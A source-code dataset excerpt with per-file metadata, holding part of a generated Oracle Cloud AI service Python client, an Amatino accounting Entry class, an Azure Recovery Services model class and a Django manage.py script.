path_params=path_params,
header_params=header_params,
response_type="WorkRequest")
def list_ai_private_endpoints(self, compartment_id, **kwargs):
resource_path = "/aiPrivateEndpoints"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"lifecycle_state",
"display_name",
"id",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_ai_private_endpoints got unknown kwargs: {!r}".format(extra_kwargs))
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["CREATING", "UPDATING", "ACTIVE", "DELETING", "DELETED", "FAILED"]
if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["timeCreated", "displayName"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"lifecycleState": kwargs.get("lifecycle_state", missing),
"displayName": kwargs.get("display_name", missing),
"id": kwargs.get("id", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="AiPrivateEndpointCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="AiPrivateEndpointCollection")
def list_data_assets(self, compartment_id, **kwargs):
resource_path = "/dataAssets"
method = "GET"
expected_kwargs = [
"retry_strategy",
"project_id",
"display_name",
"limit",
"page",
"lifecycle_state",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_data_assets got unknown kwargs: {!r}".format(extra_kwargs))
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["ACTIVE", "DELETED"]
if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["timeCreated", "displayName"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"projectId": kwargs.get("project_id", missing),
"displayName": kwargs.get("display_name", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"lifecycleState": kwargs.get("lifecycle_state", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="DataAssetCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="DataAssetCollection")
def list_models(self, compartment_id, **kwargs):
resource_path = "/models"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"project_id",
"lifecycle_state",
"display_name",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_models got unknown kwargs: {!r}".format(extra_kwargs))
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["DELETING", "DELETED", "FAILED", "CREATING", "ACTIVE", "UPDATING"]
if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["timeCreated", "displayName"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"projectId": kwargs.get("project_id", missing),
"lifecycleState": kwargs.get("lifecycle_state", missing),
"displayName": kwargs.get("display_name", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ModelCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ModelCollection")
def list_projects(self, compartment_id, **kwargs):
resource_path = "/projects"
method = "GET"
expected_kwargs = [
"retry_strategy",
"lifecycle_state",
"display_name",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_projects got unknown kwargs: {!r}".format(extra_kwargs))
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["ACTIVE", "CREATING", "FAILED", "DELETING", "DELETED", "UPDATING"]
if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["timeCreated", "displayName"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"lifecycleState": kwargs.get("lifecycle_state", missing),
"displayName": kwargs.get("display_name", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ProjectCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ProjectCollection")
def list_work_request_errors(self, work_request_id, **kwargs):
resource_path = "/workRequests/{workRequestId}/errors"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"page",
"limit"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_request_errors got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestErrorCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestErrorCollection")
def list_work_request_logs(self, work_request_id, **kwargs):
resource_path = "/workRequests/{workRequestId}/logs"
method = "GET"
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"page",
"limit"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_request_logs got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestLogEntryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestLogEntryCollection")
def list_work_requests(self, compartment_id, **kwargs):
resource_path = "/workRequests"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"work_request_id",
"opc_request_id",
"page",
"limit"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_requests got unknown kwargs: {!r}".format(extra_kwargs))
query_params = {
"compartmentId": compartment_id,
"workRequestId": kwargs.get("work_request_id", missing),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestSummaryCollection")
def update_ai_private_endpoint(self, ai_private_endpoint_id, update_ai_private_endpoint_details, **kwargs):
resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}"
method = "PUT"
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_ai_private_endpoint got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"aiPrivateEndpointId": ai_private_endpoint_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_ai_private_endpoint_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_ai_private_endpoint_details)
def update_data_asset(self, data_asset_id, update_data_asset_details, **kwargs):
resource_path = "/dataAssets/{dataAssetId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"dataAssetId": data_asset_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_asset_details,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_asset_details,
response_type="DataAsset")
def update_model(self, model_id, update_model_details, **kwargs):
resource_path = "/models/{modelId}"
method = "PUT"
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_model got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"modelId": model_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_model_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_model_details)
def update_project(self, project_id, update_project_details, **kwargs):
resource_path = "/projects/{projectId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"projectId": project_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_project_details,
response_type="Project")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_project_details,
response_type="Project")
| true | true |
1c2c86dbcc5a343b86f1588a38a45c5d4e0e5f59 | 4,341 | py | Python | amatino/entry.py | Amatino-Code/amatino-python | 6c5f66b2e61bede5bf9d3e6eee8130a16f511a5f | [
"MIT"
] | 2 | 2018-07-20T20:00:33.000Z | 2020-10-08T15:49:06.000Z | amatino/entry.py | Amatino-Code/amatino-python | 6c5f66b2e61bede5bf9d3e6eee8130a16f511a5f | [
"MIT"
] | 1 | 2020-05-21T02:49:29.000Z | 2020-05-21T02:49:29.000Z | amatino/entry.py | Amatino-Code/amatino-python | 6c5f66b2e61bede5bf9d3e6eee8130a16f511a5f | [
"MIT"
] | 3 | 2018-09-03T09:31:31.000Z | 2020-05-21T05:30:00.000Z | """
Amatino API Python Bindings
Entry Module
Author: hugh@amatino.io
"""
from amatino.side import Side
from amatino.account import Account
from amatino.internal.constrained_string import ConstrainedString
from amatino.internal.encodable import Encodable
from amatino.internal.immutable import Immutable
from decimal import Decimal
from typing import Dict
from typing import Any
from typing import TypeVar
from typing import Optional
from typing import Type
from typing import List
T = TypeVar('T', bound='Entry')
class Entry(Encodable):
"""
Entries compose Transactions. An individual entry allocates some value to
an Account as either one of the fundamental Sides: a debit or a credit.
All together, those debits and credits will add up to zero, satisfying the
fundamental double-entry accounting equality.
"""
MAX_DESCRIPTION_LENGTH = 1024
def __init__(
self,
side: Side,
amount: Decimal,
account: Optional[Account] = None,
description: Optional[str] = None,
account_id: Optional[int] = None
) -> None:
if not isinstance(side, Side):
raise TypeError('side must be of type `Side`')
if not isinstance(amount, Decimal):
raise TypeError('amount must be of type `Decimal`')
self._side = side
if account_id is not None:
assert isinstance(account_id, int)
self._account_id = account_id
else:
if not isinstance(account, Account):
raise TypeError('account must be of type `Account`')
self._account_id = account.id_
self._amount = amount
self._description = Entry._Description(description)
return
side = Immutable(lambda s: s._side)
account_id = Immutable(lambda s: s._account_id)
amount = Immutable(lambda s: s._amount)
description = Immutable(lambda s: s._description)
def serialise(self) -> Dict[str, Any]:
data = {
'account_id': self._account_id,
'amount': str(self._amount),
'description': self._description.serialise(),
'side': self._side.value
}
return data
class _Description(Encodable):
def __init__(self, string: Optional[str]) -> None:
if string is not None and not isinstance(string, str):
raise TypeError('description must be of type `str` or None')
if string is None:
string = ''
self._description = ConstrainedString(
string,
'description',
Entry.MAX_DESCRIPTION_LENGTH
)
return
def serialise(self) -> str:
return str(self._description)
@classmethod
def create(
cls: Type[T],
side: Side,
amount: Decimal,
account: Account,
description: Optional[str] = None
) -> T:
return cls(side, amount, account=account, description=description)
@classmethod
def create_balanced_pair(
cls: Type[T],
debit_account: Account,
credit_account: Account,
amount: Decimal,
description: Optional[str] = None
) -> List[T]:
debit = cls(Side.debit, amount, debit_account, description)
credit = cls(Side.credit, amount, credit_account, description)
return [debit, credit]
@classmethod
def plug(
cls: Type[T],
account: Account,
entries: List[T],
description: Optional[str] = None
) -> Optional[T]:
"""
Return an entry plugging the balance gap in a given set of Entries. Or,
return None if the Entries already balance.
"""
if False in [isinstance(e, Entry) for e in entries]:
raise TypeError('Entries must be of type List[Entry]')
debits = sum([e.amount for e in entries if e.side == Side.debit])
credits_ = sum([e.amount for e in entries if e.side == Side.credit])
if debits == credits_:
return None
if debits > credits_:
plug_side = Side.credit
amount = Decimal(debits - credits_)
else:
plug_side = Side.debit
amount = Decimal(credits_ - debits)
return cls(plug_side, amount, account, description)
| 30.356643 | 79 | 0.615066 | from amatino.side import Side
from amatino.account import Account
from amatino.internal.constrained_string import ConstrainedString
from amatino.internal.encodable import Encodable
from amatino.internal.immutable import Immutable
from decimal import Decimal
from typing import Dict
from typing import Any
from typing import TypeVar
from typing import Optional
from typing import Type
from typing import List
T = TypeVar('T', bound='Entry')
class Entry(Encodable):
MAX_DESCRIPTION_LENGTH = 1024
def __init__(
self,
side: Side,
amount: Decimal,
account: Optional[Account] = None,
description: Optional[str] = None,
account_id: Optional[int] = None
) -> None:
if not isinstance(side, Side):
raise TypeError('side must be of type `Side`')
if not isinstance(amount, Decimal):
raise TypeError('amount must be of type `Decimal`')
self._side = side
if account_id is not None:
assert isinstance(account_id, int)
self._account_id = account_id
else:
if not isinstance(account, Account):
raise TypeError('account must be of type `Account`')
self._account_id = account.id_
self._amount = amount
self._description = Entry._Description(description)
return
side = Immutable(lambda s: s._side)
account_id = Immutable(lambda s: s._account_id)
amount = Immutable(lambda s: s._amount)
description = Immutable(lambda s: s._description)
def serialise(self) -> Dict[str, Any]:
data = {
'account_id': self._account_id,
'amount': str(self._amount),
'description': self._description.serialise(),
'side': self._side.value
}
return data
class _Description(Encodable):
def __init__(self, string: Optional[str]) -> None:
if string is not None and not isinstance(string, str):
raise TypeError('description must be of type `str` or None')
if string is None:
string = ''
self._description = ConstrainedString(
string,
'description',
Entry.MAX_DESCRIPTION_LENGTH
)
return
def serialise(self) -> str:
return str(self._description)
@classmethod
def create(
cls: Type[T],
side: Side,
amount: Decimal,
account: Account,
description: Optional[str] = None
) -> T:
return cls(side, amount, account=account, description=description)
@classmethod
def create_balanced_pair(
cls: Type[T],
debit_account: Account,
credit_account: Account,
amount: Decimal,
description: Optional[str] = None
) -> List[T]:
debit = cls(Side.debit, amount, debit_account, description)
credit = cls(Side.credit, amount, credit_account, description)
return [debit, credit]
@classmethod
def plug(
cls: Type[T],
account: Account,
entries: List[T],
description: Optional[str] = None
) -> Optional[T]:
if False in [isinstance(e, Entry) for e in entries]:
raise TypeError('Entries must be of type List[Entry]')
debits = sum([e.amount for e in entries if e.side == Side.debit])
credits_ = sum([e.amount for e in entries if e.side == Side.credit])
if debits == credits_:
return None
if debits > credits_:
plug_side = Side.credit
amount = Decimal(debits - credits_)
else:
plug_side = Side.debit
amount = Decimal(credits_ - debits)
return cls(plug_side, amount, account, description)
| true | true |
1c2c872739c70760c2acb09a3e43c88a93ad2117 | 1,095 | py | Python | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/recovery_point.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 4 | 2016-06-17T23:25:29.000Z | 2022-03-30T22:37:45.000Z | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/recovery_point.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/recovery_point.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 3 | 2016-05-03T20:49:46.000Z | 2017-10-05T21:05:27.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class RecoveryPoint(Model):
"""Base class for backup copies. Workload-specific backup copies are derived
from this class.
:param object_type: Polymorphic Discriminator
:type object_type: str
"""
_validation = {
'object_type': {'required': True},
}
_attribute_map = {
'object_type': {'key': 'objectType', 'type': 'str'},
}
_subtype_map = {
'object_type': {'GenericRecoveryPoint': 'GenericRecoveryPoint', 'IaasVMRecoveryPoint': 'IaasVMRecoveryPoint'}
}
def __init__(self):
self.object_type = None
| 29.594595 | 117 | 0.593607 |
from msrest.serialization import Model
class RecoveryPoint(Model):
_validation = {
'object_type': {'required': True},
}
_attribute_map = {
'object_type': {'key': 'objectType', 'type': 'str'},
}
_subtype_map = {
'object_type': {'GenericRecoveryPoint': 'GenericRecoveryPoint', 'IaasVMRecoveryPoint': 'IaasVMRecoveryPoint'}
}
def __init__(self):
self.object_type = None
| true | true |
1c2c884d9cde661100911e4d30b0255ffac3b8d3 | 645 | py | Python | ecom/manage.py | TomSCoding/ecommerce-base | 7057afe83277209fef53fda44e3e8c84afc57bde | [
"MIT"
] | null | null | null | ecom/manage.py | TomSCoding/ecommerce-base | 7057afe83277209fef53fda44e3e8c84afc57bde | [
"MIT"
] | 277 | 2019-10-11T06:58:27.000Z | 2022-03-12T00:50:30.000Z | ecom/manage.py | TomSCoding/ecommerce-base | 7057afe83277209fef53fda44e3e8c84afc57bde | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ecom.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 29.318182 | 74 | 0.658915 |
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ecom.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| true | true |
